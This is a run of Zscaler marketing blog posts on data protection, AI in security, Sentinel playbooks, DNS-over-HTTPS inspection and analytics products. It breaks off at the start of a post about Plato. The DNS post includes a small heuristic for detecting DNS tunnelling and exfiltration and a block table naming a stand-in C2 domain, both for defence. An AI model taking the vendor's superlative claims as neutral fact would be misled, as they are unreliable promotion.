The lines between threat and data protection continue to blur At 2023's Black Hat conference, it was astounding how many people wanted to talk about data protection. For a conference traditionally focused on stopping cyberattacks, this was profound, and it alluded to a shift happening across the industry. After all, it’s true what they say: it’s all about data. Today’s cyberthreats are as much about stealing data as hurting company productivity. Adversaries have realized data is a gold mine, and they will continue to exploit it. So, as security architects think about building out defenses against today’s threats, data protection will become an integral part of the equation. As we blast through 2024, watch out for new data protection offerings that give you more choices on the surface—but that also risk a fragmented approach. The moral of the story is keep your eye on the prize. There’s a reason data protection is part of SSE, one of the fastest-growing security architectures in the last decade. When data protection is centralized in a high-performance inspection cloud with a single agent, things become super streamlined and unified across all channels you need for great protection. Remember that DLP is the core building block of data protection. With a centralized DLP engine, all data across endpoint, network, and at rest in clouds triggers the same way. This leads to a single point of truth for protection, investigations, and incident management, which is what every IT team wants. 5. Every prediction blog will have something about GenAI Our other predictions will have varying hit rates, but this one is 100% guaranteed. No 2024 prediction blog will be complete without GenAI. It’s going to revolutionize the world right before it destroys it, right? Like all new technology crazes, there will be an equilibrium process. Sure, GenAI will enable us to move faster and smarter, but there will be a learning curve around what it does well, and what it doesn’t. 
Companies will try to integrate it across their business stack to varying degrees of success. But one thing is for sure: data will be headed to GenAI at an alarming rate, so data protection will need to focus on controlling what data goes into GenAI while leveraging GenAI’s power to find risks faster. (I realize I just said, in essence, “using GenAI to catch GenAI leaking data to GenAI,” so apologies for that.) Basically, GenAI is just another productivity tool we need to protect against misuse. Treat GenAI like a shadow IT app. To control it, you need a platform that delivers complete visibility and the proper levers to enable it safely within your organization while ensuring sensitive data doesn’t leak to it. The other half of this is using GenAI to make security smarter. AI will continue to find its way into the ubiquity of computing. We will take for granted its power to help us deliver more powerful correlation, context, analysis, and response times. That’s the relentless pursuit of better security, which is what we’re all about. But let's avoid calling anything in the future “NexGenAI,” because as a marketer, that’s just not cool, man. Putting it all together If you’ve made it this far, you’ve probably picked up on a few themes. Great data protection requires context, integration, posture, and a platform to bring it all together. There’s no telling how far security service edge will take us, but it’s set up for a great year as its architecture expertly enables new features, improves on existing ones, and delivers all-around unified, high-performance data protection. If you’re looking to up your data security game in 2024, we’ve got you covered. Jump on over to read about the Zscaler Data Protection platform or get in touch with us to book a demo. Interested in reading more about Zscaler's predictions in 2024? Read our previous blog in the series about cyber predictions. 
Thu, 04 Jan 2024 08:00:01 -0800 Steve Grossenbacher AI: Boon or Bane to Security? Security professionals believe offensive AI will outpace defensive AI A recent Cybersecurity Insiders report found that AI is transforming security—making fundamental (and likely permanent) changes to both the attacker and defender toolkits. The “Artificial Intelligence in Cybersecurity” report surveyed 457 cybersecurity professionals online and also tapped into Cybersecurity Insiders’ community of 600,000 information security professionals to find out what CISOs and their frontline teams think about AI’s impact on cybersecurity. The report reveals some sobering findings on what security professionals most fear about AI in the hands of malicious actors. According to the report, 62% of security professionals believe offensive AI will outpace defensive AI. Here’s a breakdown of the report and Zscaler’s take on what to do to combat AI-driven cyberattacks. Source: 2023 Artificial Intelligence in Cybersecurity Report, Cybersecurity Insiders AI increases the sophistication of cyberattacks Unsurprisingly, 71% of respondents believe AI will make cyberattacks significantly more sophisticated, and 66% think these attacks will be more difficult to detect.
Source: 2023 Artificial Intelligence in Cybersecurity Report by Cybersecurity Insiders These findings align with observations by the Zscaler ThreatLabz security research team. For instance, the 2023 ThreatLabz Phishing Report noted that AI tools have significantly contributed to the growth of phishing, reducing criminals’ technical barriers to entry while saving them time and resources. Concerningly, the use of AI in phishing campaigns is projected to grow in the coming years. Bracing for AI-enabled ransomware and cyber extortion attacks should be top-of-mind for security practitioners. Think about it: ransomware attacks typically start with social engineering, which 53% of respondents believe will grow more dangerous because of AI. For instance, attackers can use AI voice cloning to impersonate employees to gain privileged access, or use generative AI to help craft convincing phishing emails. Moreover, it will get easier for attackers to discover and identify zero-day vulnerabilities. Also, the business model of encryption-less extortion—in which threat actors steal data and demand a ransom to avoid a leak, rather than encrypting files—will benefit from advancements in AI-enabled tools that can drastically speed up the development of malicious code, exacerbating the threat to both public and private organizations. Organizations plan to increase AI usage in security Zscaler strongly recommends that security practitioners prepare for more coordinated and effective attacks on larger groups of people, as threat actors will leverage AI to launch more sophisticated scams across different communication channels, such as email, SMS, and websites. As the Cybersecurity Insiders survey found, security teams plan to invest more in defensive AI capabilities to do just that.
Source: 2023 Artificial Intelligence in Cybersecurity Report by Cybersecurity Insiders In another notable finding, 48% of respondents believe the use of deep learning for detecting malware in encrypted traffic holds the most promise for enhancing cyber defenses. At Zscaler, we have always advocated for inspecting most (if not all) TLS/SSL traffic and applying layered inline security controls. Today, at least 95% of traffic is encrypted (Google Transparency Report), and the Zscaler ThreatLabz 2023 State of Encrypted Attacks report shows that 85.9% of threats are now delivered over encrypted channels, underscoring the need for thorough inspection of all traffic. The Zscaler Zero Trust Exchange inspects HTTPS at scale using a multilayered approach with inline threat inspection, sandboxing, data loss prevention, and a wide array of additional defense capabilities. On top of all that, the AI-powered Zscaler cloud effect means that all threats identified across the global platform trigger automatic updates to protect all Zscaler customers. Strategies for combating AI-powered adversaries Technology has always been a double-edged sword. The age of AI has arrived, and it is just beginning. Accordingly, organizations should prioritize the adoption of AI for cyberthreat protection—so it is gratifying that 74% of respondents say AI is a “medium” to “top” priority for their organization. Additionally, partnering with security vendors who offer superior AI capabilities is crucial. This is easier said than done, as most vendors now claim to leverage AI. The best way forward is to educate yourself, look to vendors with a proven record of technological innovation, and engage them in proofs of concept to assess the efficacy of their solutions for yourself. To find out more about why you need an AI-powered zero trust security platform such as Zscaler’s, watch this on-demand webinar. 
To read the full “Artificial Intelligence in Cybersecurity” report by Cybersecurity Insiders, get your complimentary copy here. Mon, 08 Jan 2024 08:00:01 -0800 Apoorva Ravikrishnan Elevating Cybersecurity: Introducing Zscaler and Microsoft Sentinel's New SIEM & SOAR Capabilities The evolution of Security Information and Event Management (SIEM) and Security Orchestration, Automation, and Response (SOAR) technologies has been pivotal in shaping modern cybersecurity strategies. Traditionally, SIEM systems were primarily focused on data aggregation and alert generation, often resulting in an overwhelming number of alerts for security teams to handle. However, as cyberthreats grew more sophisticated, the need for a more proactive and responsive approach became evident. This led to the emergence of SOAR solutions, which complement SIEM by adding layers of automation, orchestration, and advanced response capabilities. Microsoft Sentinel represents the culmination of this evolution. As a cutting-edge SIEM and SOAR solution, Sentinel offers not only comprehensive data collection and analysis but also integrates automated response mechanisms. These advancements allow for quicker, more efficient handling of security incidents, ultimately enhancing the ability of organizations to swiftly adapt and respond to the ever-changing threat landscape. Keeping pace with these advanced features, Zscaler is excited to unveil two new integrations as part of our zero trust collaboration with Microsoft Sentinel. These are: Cloud NSS for ZIA log ingestion into Microsoft Sentinel Zscaler's Cloud NSS, our innovative cloud-to-cloud log streaming service, now makes its way to Microsoft Sentinel, making it faster and easier to deploy, manage, and scale log ingestion from the Zscaler cloud to Microsoft Sentinel.
Fig: Cloud NSS overview This service enables native ingestion of Zscaler’s comprehensive cloud security telemetry into Microsoft Sentinel, enriching investigation and threat hunting for cloud-first organizations without the need to deploy any infrastructure. Key benefits include:
Reduced complexity: Since Cloud NSS operates in the cloud, it removes the need for additional on-premises hardware or infrastructure. This not only cuts down on physical resource requirements but also simplifies the overall security architecture.
Streamlined log management: Cloud NSS facilitates the efficient management and scaling of log ingestion. It simplifies the process of collecting and analyzing security logs, making it easier for organizations to manage large volumes of data.
Scalability and flexibility: Cloud NSS is inherently scalable, accommodating the growing data and security needs of an organization. This flexibility ensures that as a company grows, its security infrastructure can grow and adapt without major overhauls.
Expanded Zscaler Playbooks for Microsoft Sentinel The expanded Zscaler Playbooks for Microsoft Sentinel mark a significant advancement in our joint capability with Microsoft Sentinel. All Zscaler Playbooks leverage OAuth 2.0 for authentication, which results in:
Better security: OAuth 2.0 secures your APIs with dynamic credentials, which are time-bound and generated on demand for a client.
Limited exposure of credentials: Unlike the authentication model that uses API keys and ZIA admin credentials and may involve user management outside the organization's identity provider, OAuth 2.0 does not require ZIA admin credentials for authentication.
Granular access control: The Client Credentials OAuth flow employs API Roles to define permissions required to access specific categories of cloud service API.
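At its core, the Client Credentials grant exchanges a client ID and secret for a short-lived bearer token. The following generic Python sketch illustrates the flow; the token URL and credentials are placeholders, not Zscaler’s actual API endpoints:

```python
import json
import urllib.parse
import urllib.request

def build_token_request(token_url, client_id, client_secret):
    """Build an OAuth 2.0 Client Credentials token request.

    The POST exchanges the client's credentials for a short-lived bearer
    token, avoiding the use of static admin credentials on API calls.
    """
    body = urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
    }).encode()
    return urllib.request.Request(
        token_url,
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )

# Hypothetical usage -- the URL below is a placeholder, not a real endpoint:
# req = build_token_request("https://idp.example.com/oauth2/token", "my-id", "my-secret")
# token = json.loads(urllib.request.urlopen(req).read())["access_token"]
```

A playbook would then send the returned access token in an Authorization: Bearer header on each API call, limited to the permissions granted by its API Role.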
Fig: OAuth 2.0 Flow Take advantage of the following Zscaler Playbooks to automate your workflows:
Zscaler-OAuth2-Authentication: Authenticate using OAuth 2.0
Zscaler-OAuth2-BlacklistURL: Blacklist a URL in the Advanced Threat Protection Module.
Zscaler-OAuth2-BlockIP: Block an IP using a URL category blocklist.
Zscaler-OAuth2-BlockURL: Block a URL using a URL category blocklist.
Zscaler-OAuth2-LookupIP: Look up the URL category an IP belongs to.
Zscaler-OAuth2-LookupSandboxReport: Look up a Sandbox Report.
Zscaler-OAuth2-LookupURL: Look up the URL category a URL belongs to.
Zscaler-OAuth2-UnblacklistURL: Un-blacklist a URL in the Advanced Threat Protection Module.
Zscaler-OAuth2-UnblockIP: Remove an IP from a URL category blocklist.
Zscaler-OAuth2-UnblockURL: Remove a URL from a URL category blocklist.
Zscaler-OAuth2-WhitelistURL: Whitelist a URL in our Advanced Threat Protection Module.
Fig: Zscaler-OAuth2.0 LookupURL Playbook The new Zscaler Playbooks for Microsoft Sentinel can be downloaded now from the Zscaler GitHub repository - Wed, 20 Dec 2023 08:00:01 -0800 Paul Lopez Securing DNS over HTTPS (DoH) DNS is often the first step in the cyber kill chain. Snooping on DNS queries yields a treasure trove of information, and manipulating DNS resolution is one of the key methods of compromise. While innovations like encrypted DNS over HTTPS (DoH) help conceal queries, they can introduce new challenges for network security admins trying to implement PDNS mandates and inspect DNS traffic for signs of compromise. Fortunately, Zscaler’s DNS security capabilities built into the Zero Trust Exchange can help. DNS is a key vector in the cyber kill chain One of the first steps in any network communication is a DNS query. Given the plaintext nature of these queries, bad actors often conduct reconnaissance on the target infrastructure by snooping on DNS queries.
Manipulating DNS can give attackers the ability to conduct man-in-the-middle attacks, compromise endpoints, and steal data. DNS queries are typically connectionless and easy to subvert by modifying or bypassing resolver settings on network devices or endpoints. At the same time, DNS queries can serve as an early warning of threats and one of the best opportunities to neutralize them before any communication is established between the target and the malware site or C2 server. DNS is also often abused as the protocol for malware command and control, with TXT records used to send commands and A records used to exfiltrate data. One of the earliest and best opportunities to identify and neutralize threats, while identifying infected hosts and bad actors, is in the initial DNS requests and the ongoing DNS communications. Most legitimate web and non-web applications use DNS in at least one stage of any given session, often at the very beginning (as with normal web requests or SSH sessions) but sometimes repeatedly throughout. Bad actors recognize this dependence on DNS and the opportunity to leverage it at several stages of an attack: initially steering targets to malicious locations, issuing C2 instructions mid-stage after infection, and exfiltrating data at the end stages. Attackers take great pains to conceal their attacks’ DNS activity, obfuscating request and response communication, cycling through many domains or subdomains, abusing the protocol for malicious purposes, or poisoning entries and pointing resolutions to attacker-controlled resolvers.
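As a concrete illustration of the kind of obfuscation defenders look for, a common heuristic flags long, high-entropy subdomain labels, which often indicate data encoded into DNS queries for C2 or exfiltration. This sketch is illustrative only; the thresholds are our assumptions, not Zscaler’s detection logic:

```python
import math
from collections import Counter

def shannon_entropy(s):
    """Shannon entropy of a string, in bits per character."""
    counts = Counter(s)
    total = len(s)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def looks_like_dns_tunnel(qname, entropy_threshold=3.5, min_label_len=30):
    # Heuristic: data encoded into subdomains tends to produce leftmost
    # labels that are both long and high-entropy, unlike human-chosen names.
    label = qname.split(".")[0]
    return len(label) >= min_label_len and shannon_entropy(label) >= entropy_threshold

print(looks_like_dns_tunnel("www.example.com"))                                # False
print(looks_like_dns_tunnel("aajd8f7x93kqpl2mzn4v6b1c5t0r8ye7.evil.example"))  # True
```

Real detection combines many such signals (query volume, record types, domain age) rather than relying on any single heuristic.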
Figure 1: DNS Control Breaks the Kill Chain New emphasis on DNS security in an encrypted world One of the biggest changes underway is the push to encrypted DNS. DNS over HTTPS (DoH) started out purely as a privacy tool but is now increasingly recommended by national governments worldwide as a way for industries to maintain security and integrity, in addition to privacy, in what has until now been one of the last major services to remain widely unencrypted. Many of these same national governments, led by the Five Eyes intelligence alliance and their close allies, often require their national agencies to use DoH as a key ingredient in their Protective DNS (PDNS) mandates. Figure 2: National governments increasingly recommend–and in some cases, require–a PDNS solution Unfortunately, attackers are also aware of both the trend toward encrypted DNS and the opportunity it presents them – particularly since DoH often cannot be inspected, or can only be partially inspected. Attackers are also aware that DoH is increasingly enabled by default in most browsers and configurable by users and processes. And since DoH is increasingly recommended as a best practice in PDNS recommendations, mandates, and beyond, DoH traffic is no longer unusual on a corporate network, and simply blocking it is no longer acceptable when encrypted web traffic (HTTPS generally) can be inspected. New challenges for legacy solutions Bad actors understand better than most that legacy-gen firewall and proxy designs – whether now “cloudified” or still trapped in virtual or physical boxes – are inherently limited to simple block/allow policies for encrypted DNS. Crime syndicates further understand that administrators are hesitant to enable TLS decryption since this often results in a noticeable performance degradation on legacy-gen appliance-based firewalls.
Inspecting SSL/TLS brings a step function of added hardware spend, complicated user and traffic segmentation, or added network administration complexity, and usually all three at once.
Figure 3: Using only a pure-play DNS resolver service may mean some DNS queries bypass DNS security controls
Some of the more advanced legacy vendor solutions extend their general DoH block/allow policies to known resolver services. That is, they trust certain third-party DoH resolvers but leave the content of the DNS over HTTPS communication uninspected and policy unenforced. Because of this inspection gap, companies often need to concurrently engage unintegrated third-party DNS service providers and manage policies across multiple platforms, all while trying to ensure that no attacker, malware, or insider circumvents the controls by reaching a new unsanctioned or malicious DoH service provider.
Figure 4: Legacy-gen firewall-only and standard proxy solutions are limited in DNS inspection and may miss DNS transactions entirely. They also usually require another vendor to deliver a complete DNS solution.
Securing DNS with Zscaler using zero trust controls in the cloud
Zscaler provides a proxy and security control layer in our Zero Trust Exchange for all traffic, including DNS. All DNS over HTTPS and standard DNS traffic is fully inspected regardless of which DNS resolver service the endpoint uses. Zscaler also secures recursive and iterative requests. Using Zscaler for DNS brings the zero trust approach to all DNS for complete security: every DNS transaction is inspected and secured according to security policy for all users, workloads, and servers, all the time. This not only fulfills the security demands of Protective DNS and other DNS security best practices but extends corporate security to all DNS over HTTPS and to all corners of the customer estate, from mobile users to cloud workloads to guest Wi-Fi access points.
Figure 5: Complete zero trust DNS security
Every DNS transaction passes through complete zero trust DNS security steps that uphold NIST 800-207 principles, including:
1. What is the identity of the user? Endpoint, workload, server?
2. Which DNS protocol is being used (DoH, UDP:53, TCP:53)?
3. What is being communicated or requested? Domain, metadata, tunnel, record type?
4. Where is the DNS transaction trying to go? Where should it go instead?
5. Is the inspected request-side transaction allowed, considering the above?
6. What is the category of the inspected content? Allow/block/log the request and act.
7. Does the request need to be translated to another DNS protocol (UDP to DoH, etc.)?
8. What is the inspected response to the matching allowed request? Is it expected and allowed for this user? Domain, content, metadata, tunnel, record type, etc.?
9. Allow/block/log the response and act.
10. If the response is allowed, does it need to be translated back to the original DNS protocol (DoH to UDP, etc.)?
11. Complete the allowed DNS transaction.
12. Complete and enrich log data for the transaction.
Global scale of the Zscaler Trusted Resolver
Another unique capability of the Zscaler service is the optional Zscaler Trusted Resolver (ZTR). ZTR consists of clusters of DNS resolvers in almost all of our 150 global data centers that Zscaler customers can use for public recursive queries. DNS requests to any provider can be configured to be intercepted as they transit the Zero Trust Exchange and resolved instead at the ZTR instance in the data center nearest the requestor. Optionally, ZTR can be addressed explicitly, removing any need for a public resolver or third-party service. DNS resolution is not currently part of either the SASE or SSE definition, so most vendors in those categories do not offer it; without Zscaler, DNS resolution requires a separate vendor.
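The request-side portion of a transaction flow like the one above can be sketched as a small policy evaluation. This is an illustrative sketch only: the field names, category tables, and decision structure below are hypothetical stand-ins, not Zscaler's actual policy model.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class DnsTransaction:
    user: str         # identity of the requester (user, workload, or server)
    protocol: str     # "doh", "udp53", or "tcp53"
    domain: str       # requested domain
    record_type: str  # "A", "TXT", ...

# Hypothetical policy tables for illustration only.
BLOCKED_CATEGORIES = {"malware", "newly-registered"}
DOMAIN_CATEGORIES = {
    "c2.badsite.example": "malware",
    "news.example": "news",
}

def evaluate(txn: DnsTransaction, resolver_protocol: str = "doh") -> dict:
    """Mirror the request-side steps: identify, classify, decide, translate, log."""
    category = DOMAIN_CATEGORIES.get(txn.domain, "uncategorized")
    if category in BLOCKED_CATEGORIES:
        # Block and log; the transaction never reaches a resolver.
        return {"action": "block", "category": category, "log": True}
    # Allowed: translate to the resolver-side protocol if it differs
    # (e.g., a UDP:53 request forwarded upstream as DoH).
    translate: Optional[str] = (
        resolver_protocol if txn.protocol != resolver_protocol else None
    )
    return {"action": "allow", "category": category,
            "translate_to": translate, "log": True}
```

The response side would run a matching inspection (steps 8 through 12), translating the answer back to the original protocol before completing and logging the transaction.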
Zero trust DNS security is provided for all DNS transactions whether or not the Zscaler Trusted Resolver is used. The benefits of ZTR center on having a fast, highly available DNS service that is globally distributed and returns geographically localized resolutions. Since ZTR supports DNSSEC, there is the added advantage of high-integrity resolutions on top of zero trust DNS security.
Capability | Zscaler | Other SSE Solutions | Legacy-Gen Firewalls | DNS Providers
Standard DNS content inspection | ✅ | ✅ | ✅ | Can be bypassed
Basic DoH inspection | ✅ | If DoH then block/allow | If DoH then block/allow | Typically bypassed
DoH content inspection | ✅ | X | Limited by TLS decryption capacity | Typically bypassed
Global DNS resolution service | ✅ | X | X | ✅
Complete DNS Control — better security and performance
The Zscaler Zero Trust Exchange is the only cloud-native solution that offers complete DNS security along with better DNS performance through our Trusted Resolver. DNS Control is a single, consolidated function embedded within the wider Zscaler service that delivers the highest DNS security efficacy with the best possible user experience, all while reducing vendor sprawl, complexity, and cost. Organizations needing to improve DNS security and privacy, or facing PDNS mandates, can ensure they have protection against emerging DNS-based threats. All customers with ZIA and Cloud Firewall enabled can configure DNS Control rules, including full inspection of DoH traffic. Fri, 15 Dec 2023 08:00:01 -0800 Stefan Sebastian
Zscaler Risk360 − Outlook
In recent months, we have spoken with many organizations about how to improve cyber risk management. In the process, we have seen enormous demand for a reliable, repeatable method of governing and mitigating cyber risk.
There are good reasons for this. First, there is the need to quantify and mitigate cyber risk in order to improve the overall security posture and thereby lower the likelihood of an attack. Second, reporting obligations keep growing, both internally toward management and the board, and externally, for example under the new SEC disclosure rules. Against this backdrop, companies often rely on manual processes in which they aggregate data from various tools, normalize it, and then present it in report form. This is not only time-consuming but also ties up staff who could otherwise be actively protecting company resources. Third-party products are therefore frequently brought in as well, but they are expensive to acquire and tend to be complicated and incomplete. To change this, Zscaler launched a new product this summer: Risk360. Built on the Zscaler cloud, Risk360 was developed to solve exactly these problems, and it is already receiving its first major product update with numerous improvements.
The Risk360 advantage
Zscaler Risk360 is a powerful framework for quantifying, visualizing, and remediating cyber risk. It ingests data from external sources and from the organization's Zscaler environment and uses it to build a detailed view of the risk posture across all four potential attack stages. More than 110 risk factors from across the attack chain are applied, covering risks, threats, and potentially dangerous user actions that pose a risk to the organization. From these factors, Risk360 calculates the cyber risk and tracks it over time. It also delivers recommendations for risk mitigation and the corresponding workflows.
Beyond that, Risk360 quantifies financial risk and generates up-to-date board reports at the click of a mouse. One of Risk360's particular strengths is its ability to evaluate the effectiveness of security controls across the four attack stages: attack surface, compromise, lateral movement, and data loss. Risk360 leverages the proven Zscaler architecture and sits directly in the traffic path. This keeps Risk360 supplied with data and lets organizations conveniently manage cyber risk with their current Zscaler deployment, without taking on additional costs.
What's new
Zscaler released Risk360 only a few months ago, yet the first major product update is already here. The new capabilities:
New CrowdStrike integration: Risk360 now also integrates with CrowdStrike so that risk signals can be pulled from its threat intelligence platform, helping Risk360 identify potential risks even more effectively.
UEBA risk detection: Analyzing the behavior of users and entities (User and Entity Behavior Analytics, UEBA) is an important part of cybersecurity, enabling organizations to detect and defend against potential threats from insiders and compromised user accounts. Risk360 can now surface UEBA risks using additional factors, analyze user behavior, and detect unusual activity.
AI-powered security assessments: Zscaler's generative AI includes purpose-built large language models (LLMs) and can produce entirely new assessments. These can replace costly external consultants and provide a more accurate picture of the organization's zero trust security posture.
Expanded financial models: Risk360 has been extended with additional modeling capabilities based on Monte Carlo simulations.
This makes it possible to build scenarios that account for financial and residual risks, inherent risks, and risk tolerance. A more accurate estimate of potential financial risk in turn supports damage limitation from a financial perspective.
Risk framework support: To implement common industry standards, Risk360 has been extended with frameworks such as MITRE ATT&CK and NIST CSF. These are applied automatically, easing the burden on organizations in the areas of risk mitigation and compliance.
SEC compliance: Risk360 has been extended with additional reporting features that, among other things, ensure compliance with SEC regulation S-K Item 106(b) on the description of cybersecurity processes.
With these enhancements, Risk360 continues to give companies comprehensive, data-driven cyber risk management. To learn more, register for our webinar covering Zscaler Risk360 and the new Zscaler Business Insights, or request a demo from us. Tue, 12 Dec 2023 04:00:01 -0800 Raj Krishna
Zscaler Business Insights: Optimized office utilization and lower SaaS costs
The world of work is constantly evolving, and workforces have become increasingly distributed in recent years. To accommodate this, companies now rely on SaaS applications for collaboration and productivity. The current shift is above all the rise of hybrid work models, in which employees alternate between working from home and working in the office, balancing collaborative in-office work with the flexibility of remote work. Naturally, the executives responsible want to keep SaaS spend and real estate costs as low as possible. But to do so, they need visibility into cost drivers such as office space and SaaS applications, which is hardly possible with the tools available so far.
All too often, organizations are left with unreliable manual processes and estimates that are then transferred into spreadsheets. Many real estate and facilities departments also analyze badge readers used for time tracking in order to better understand employee behavior and encourage the return to the office. Ironically, some companies even deploy expensive SaaS management tools to monitor SaaS usage, tools that often fail to provide an accurate picture of actual SaaS spend. To change this, Zscaler is launching Business Insights, the latest addition to its business analytics portfolio. This powerful product enables precise measurement of SaaS application usage and costs while optimizing office utilization. Companies can thus make data-driven decisions and make their hybrid ways of working significantly more efficient and cost-effective.
Optimizing SaaS usage and spend
Zscaler Business Insights stands out above all for its comprehensive insights into SaaS usage and spend. In many companies, redundant applications and unused licenses cause unnecessary costs and operational overhead. Benefits of Business Insights for IT decision-makers:
• A complete overview of all SaaS applications
• Reliable data on SaaS usage
• Rationalized use of SaaS applications and detection of redundant apps
• Visualization of SaaS savings from eliminating unused applications and licenses
A smooth return to the office
When employees return to the office, accurate office utilization figures are essential for making optimal use of space. Business Insights delivers the key data here, helping companies use their office space efficiently and identify areas where space can be reduced.
Benefits of Business Insights for IT and procurement departments as well as real estate managers:
• Daily figures on in-office attendance and hybrid or remote work
• Figures on which departments are present most and least often
• Hourly visualization of office traffic for optimal allocation of space for meetings, meals, and other services
• Weekly, monthly, and quarterly office usage trends
• End-to-end site management with accurate office utilization figures (coming soon)
Zscaler Business Insights lets companies keep using their existing Zscaler architecture unchanged to optimize SaaS and office usage for an efficient and cost-effective digital transformation. Find more information and request a demo here. Tue, 12 Dec 2023 04:00:01 -0800 Aditya Jayan
Why Rethinking Legacy Network Architectures Is Key For Enterprises
Ransomware attacks increased by 37% in 2023, with the average enterprise paying ransoms exceeding $100,000. The latest Zscaler ThreatLabz report discusses this in detail. This is just one example of the cyberattacks plaguing institutions. These attacks follow a familiar pattern: exploiting a large attack surface, compromising systems, moving laterally through the organization, and then exfiltrating data.
Opportunities for Cybercriminals
It's not that organizations aren't trying to prevent attacks; it's that they need to rethink their network architecture, especially given the refactoring that has happened over the last couple of years. IT teams had to pivot as organizations went 100% remote, and then shifted again as many organizations became hybrid, with employees coming into the office a couple of days a week. These changes affect employees and how they work. They now expect great experiences from both their home environment and their in-office environment, but often fail to consider the security implications.
Protecting the company's assets shouldn't introduce complexity or impact end users. As organizations have taken these changes in stride, they have also continued investing in cloud resources to keep up with business demand. Workloads must likewise have seamless, secure connectivity across clouds, VPCs, and data centers. Keeping these workloads safe is essential, as they are extensions of your data centers and applications. The simple yet complex question is: "Does it make sense to continue purchasing VPNs and firewalls, expanding unsecured WAN connectivity, and connecting cloud workloads without rethinking the current network architecture for the future?" When dissecting this question, thinking through all the challenges and potential approaches can be difficult. Here are some sample questions to consider:
Are VPNs and firewalls required in all circumstances? Do they open up more of an attack surface, making it easier for threat actors?
My WAN infrastructure connects users and devices to all applications, which works fine, but is it secure, and can I reduce costs (MPLS) now that many people work from home?
How can I ensure my end users' performance is optimal with a hybrid workforce? Are they being backhauled over a VPN to a data center, and is that the most efficient path? Do we have the monitoring tools needed to identify last-mile ISP and Wi-Fi issues?
We are moving mission-critical workloads to the cloud, but securing them is challenging. The cloud has some native security capabilities, but what are the best ways to educate our staff and move away from point solutions?
Looking back at the last few years, it's impressive how IT teams have kept the lights on with minimal staff. They've endured a lot, from expanded roles to ensuring the business thrives. We can't anticipate what the future holds, but an architecture that solves many of these challenges through simplicity while lowering costs is worth considering.
Take a few moments to download our ebook and dive deeper into future-proofing your network architecture. Tue, 12 Dec 2023 08:58:18 -0800 Rohit Goyal
Zscaler Business Analytics for distributed enterprises
Companies are becoming increasingly decentralized, which creates numerous new challenges. Work today can happen practically anywhere: from home, on the road, or in hybrid work models. Companies naturally want to preserve employee productivity, so they deploy SaaS apps and try to avoid IT problems wherever possible. Yet at the same time, SaaS applications and mobile users keep expanding their attack surface and cyber risk.
A lack of meaningful data
These trends are a key facet of digital transformation and bring new challenges for IT decision-makers. How can costs and risks (both cyber and productivity risks) be contained when work happens across SaaS applications, home offices, and branch offices around the world? The answer: with the right analytics and data. Our customers tell us time and again that they lack meaningful figures on cyber risk, the user experience of remote workers, and cost items such as SaaS or underutilized office space. Their existing solutions simply no longer get them there. As a result, they often buy additional, costly tools or burden their staff with laborious analysis and reporting workflows. Point solutions, for example for network monitoring, SaaS application management, or risk assessment, always create additional overhead yet rarely deliver the reliable, comprehensive picture companies need. And of course, manually evaluating raw data and working it into spreadsheets is ineffective and time-consuming.
Zscaler Business Analytics: the portfolio
Effective immediately, companies can use Zscaler Business Analytics to reduce the costs and risks that come with distributed workforces. Zscaler delivers exactly the data needed for a secure and productive digital transformation, and Zscaler is the only vendor with a complete business analytics offering. Zscaler Business Analytics turns real-time data from across the enterprise into actionable recommendations, without additional tools or vendors. The offering comprises three core products:
Zscaler Digital Experience boosts productivity through fast detection and resolution of application, network, and device issues.
Zscaler Risk360 governs and limits cyber risk across all four attack stages.
Zscaler Business Insights optimizes SaaS budgets and office utilization.
The unique Zscaler architecture
Before turning to the latest news, some background on Zscaler's business analytics offering. The key term here is architecture. Our proxy architecture sits directly in the traffic path, so all traffic flows through Zscaler. The Zscaler Zero Trust Exchange processes around 320 billion transactions and 500 trillion signals per day, more data than any other security vendor. This includes not only security-relevant signals but also user and device activity, which forms the foundation of Zscaler Business Analytics. Other architectures, by contrast, are built on firewalls and focus primarily on perimeter defense. Because they do not sit in the data flow, they can deliver neither the data nor the analytics needed for digital transformation or distributed business processes.
Transparent business data
May we introduce Business Insights, the newest addition to Zscaler Business Analytics.
Business Insights delivers exactly the data needed to right-size SaaS usage and manage the return to the office. Business Insights enables:
An inventory of the entire SaaS portfolio to identify savings opportunities from unused licenses.
Detection of duplicate spend and redundant applications (such as multiple similar UCaaS solutions) through an AI-powered application catalog.
Metrics on the organization's hybrid work model, taking into account employee presence across individual regions and offices, for better planning of the return to the office.
Optimized planning of meals, space requirements, and facilities based on attendance analytics.
For more information, see our blog post on Business Insights.
Risk360 for better cyber risk governance
Earlier this year, another central component of Zscaler Business Analytics was launched. With Zscaler Risk360, companies can actively quantify and reduce cyber risk across the entire attack chain. Using real-time data from your Zscaler environment, it builds intuitive visualizations, financial risk details, and practical recommendations that support risk mitigation. Risk360 also helps in conversations with boards and executives and enables informed decisions to protect critical IT resources. Since Risk360's launch this summer, several additional security capabilities have been added:
AI-powered analytics using the latest large language models to produce detailed reports on cybersecurity and the company's current zero trust posture.
New risk factors, for example from CrowdStrike and users (UEBA).
Expanded financial risk models, now including Monte Carlo scenarios.
Support for risk frameworks such as MITRE ATT&CK and NIST CSF.
SEC disclosure examples for S-K Item 106.
More information about the Risk360 enhancements can be found on our blog.
An optimized user experience with ZDX
Companies need help with device, network, and application monitoring. Point solutions lack the overview that service desk and IT teams need, and those teams are under enormous pressure to guarantee a flawless user experience everywhere, resolve problems quickly, and keep operations running smoothly. Help is at hand: the latest enhancements to Zscaler Digital Experience (ZDX) deliver AI-powered insights that reduce ticket volume, speed up troubleshooting, and simplify collaboration between the service desk and IT. During root cause analysis, Zscaler searches across all devices, networks, and applications, so user productivity and satisfaction can be improved in seconds.
The Zscaler Digital Experience Incident Dashboard
In today's business environment, meaningful data is needed to master digital transformation securely, productively, and on a solid foundation. Zscaler Business Analytics offers a range of solutions for optimizing SaaS usage and costs, cyber risk management, and the user experience. With Business Insights, Risk360, and ZDX, you can increase efficiency, reduce costs, and create a seamless user experience. With Zscaler at your side, you get the guidance you need in the current economic environment. Tue, 12 Dec 2023 04:00:01 -0800 Raj Krishna
What Did Plato Have to Say About Zero Trust Security?
Plato was a philosopher from the fifth century B.C. whose work guided human thought for centuries. Nearly 2,500 years later, his influence still echoes everywhere. This is true even in cybersecurity when it comes to zero trust. How so? To answer that question, let's take a look at one of Plato's famous teachings.
Plato's allegory of the cave
This allegory might sound somewhat strange to our modern ears, but let's dive in.
